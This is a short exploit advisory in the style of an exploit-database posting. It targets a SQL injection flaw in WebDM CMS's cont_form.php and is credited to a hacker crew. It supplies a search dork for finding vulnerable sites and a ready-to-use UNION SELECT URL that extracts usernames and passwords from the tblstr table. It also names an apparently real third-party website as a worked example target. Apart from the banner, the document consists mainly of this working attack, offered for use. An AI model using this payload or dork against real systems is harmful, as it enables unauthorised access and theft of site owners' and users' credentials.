WebDM CMS SQL Injection Vulnerability * EDB-ID: * CVE: * OSVDB-ID: * Author: Dr.0rYX and Cr3w-DZ * Published: * Verified: * Exploit Code: * Vulnerable App: **************************************************************************************************** * _______ ___________.__ ___________ .__ * * ____ \ _ \______\__ ___/| |__ _____ \_ _____/______|__| ____ _____ * * / \/ /_\ \_ __ \| | | | \ ______ \__ \ | __) \_ __ \ |/ ___\\__ \ * * | | \ \_/ \ | \/| | | Y \ /_____/ / __ \_| \ | | \/ \ \___ / __ \_ * * |___| /\_____ /__| |____| |___| / (____ /\___ / |__| |__|\___ >____ / * * \/ \/ \/ \/ \/ \/ \/ * * .__ __ __ * * ______ ____ ____ __ _________|__|/ |_ ___.__. _/ |_ ____ _____ _____ * * / ___// __ \_/ ___\| | \_ __ \ \ __< | | \ __\/ __ \\__ \ / \ * * \___ \\ ___/\ \___| | /| | \/ || | \___ | | | \ ___/ / __ \| Y Y \ * * /____ >\___ >\___ >____/ |__| |__||__| / ____| |__| \___ >____ /__|_| / * * \/ \/ \/ \/ \/ \/ \/ * * Pr!v8 Expl0iT AND t00l ** * * ALGERIAN HACKERS * *********************************- NORTH-AFRICA SECURITY TEAM -************************************* [!] WebDM CMS SQL Injection Vulnerability [!] Author : Dr.0rYX and Cr3w-DZ [!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de ***************************************************************************/ [ Software Information ] [+] Vendor : http://www.internetdm.co.uk/ [+] script : WebDM CMS [+] Download : http://www.internetdm.co.uk/site/cont_form.php?cf_id=1&fid=0,333 (sell script ) [+] Vulnerability : SQL injection [+] Dork : inurl:"cont_form.php?cf_id=" **************************************************************************/ [ Vulnerable File ] http://server/[path]/cont_form.php?cf_id=[N.A.S.T ] http://server/cont_form.php?cf_id=[N.A.S.T ] [ Exploit ] http://server/[path]/cont_form.php?cf_id=-1+union+select+1,2,3,4,5,6,7,8,Group_concat(uname,0x3a,pword),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+tblstr-- [ ExAMPLE ] http://www.theroniere.com/site/cont_form.php?cf_id=-1+union+select+1,2,3,4,5,6,7,8,Group_concat(uname,0x3a,pword),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+tblstr-- [ GReet ] [+] :claw , Exploit-db.com ,Inj3ct0r.com , ALL HACKERS MUSLIMS